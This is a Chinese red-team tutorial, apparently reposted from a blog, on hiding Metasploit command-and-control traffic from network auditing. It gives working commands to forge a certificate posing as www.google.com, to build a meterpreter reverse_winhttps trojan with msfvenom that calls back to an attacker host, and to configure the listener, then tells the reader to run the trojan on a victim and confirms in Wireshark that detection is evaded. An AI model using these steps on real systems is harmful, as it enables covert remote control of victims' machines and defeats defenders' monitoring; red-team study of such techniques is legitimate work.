码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 红队隧道加密之MSF流量加密(二)


    前言

    如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征

    若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测

    这里介绍使用OpenSSL对MSF流量进行加密


    演示步骤

    1.OpenSSL创建证书SSL/TLS证书

    在攻击机Kali输入如下命令生成www..google.com.pem证书文件

    openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
    -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
    -keyout www.google.com.key \
    -out www.google.com.crt && \
    cat www.google.com.key www.google.com.crt > www.google.com.pem && \
    rm -f www.google.com.key www.google.com.crt
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    image-20221107110103415


    在当前目录查看生成的证书文件: cat www..google.com.pem

    image-20221107111248924


    2.生成MSF木马

    在证书文件所在目录输入如下命令生成msf木马

    msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.47.134 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o msf.exe
    
    • 1

    image-20221107111434221


    3.MSF开启监听

    此处配置监听还需设置两个额外选项:

    • set handlersslcert: 设置处理程序时将使用的证书
    • set StagerVerifySSLCert: 设置接收到连接时执行SSL证书验证
    msf5 > use exploit/multi/handler 
    [*] Using configured payload generic/shell_reverse_tcp
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_winhttps
    payload => windows/meterpreter/reverse_winhttps
    msf5 exploit(multi/handler) > set lhost 192.168.47.134
    lhost => 192.168.47.134
    msf5 exploit(multi/handler) > set lport 443
    lport => 443
    msf5 exploit(multi/handler) > set handlersslcert /root/www.google.com.pem
    handlersslcert => /root/www.google.com.pem
    msf5 exploit(multi/handler) > set stagerverifysslcert true
    stagerverifysslcert => true
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12

    image-20221107170236469


    访问https://192.168.47.134, 查看此网页的证书

    1

    1


    4.受害机上线

    将msf木马丢到受害机中运行, 随后msf服务端收到目标主机的meterpreter会话

    注意: 经过测试, 操作系统为win7的受害机不会上线

    image-20221107171548194


    抓包分析

    先在meterpreter会话命令行随便输条指令, 这里输入getuid

    image-20221107172759201


    随后打开wireshark抓取msf服务端与受害机之间的流量数据包, 可发现此流量使用了TLS协议加密

    image-20221107172425839


    追踪TCP流, 在tls加密前这里的数据是明文数据, 而现在是加密后的乱码数据

    1

  • 相关阅读:
    【zabbix Java开发教程】docker部署zabbix及api获取实战教程
    Flink窗口及其分类-详细说明
    php中explode函数存在的陷阱
    WEBAPIS知识案例总结(续)
    ECCV2022|时尚领域的多模态预训练预训练模型FashionViL,在五个下游任务中SOTA!
    【重学C++】01| C++ 如何进行内存资源管理?
    【毕业设计】酒店评价情感倾向分析系统 - python 深度学习
    警惕,11月这6本期刊已被剔除SCI/SSCI
    机器学习库Scikit-Learn(线性模型、岭回归、插入一列数据(insert)、提取所需列、向量机(SVM)、聚类)
    使用gitlint及template_git对git commit的提交进行提示及强制规范
  • 原文地址:https://blog.csdn.net/xf555er/article/details/128051211
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号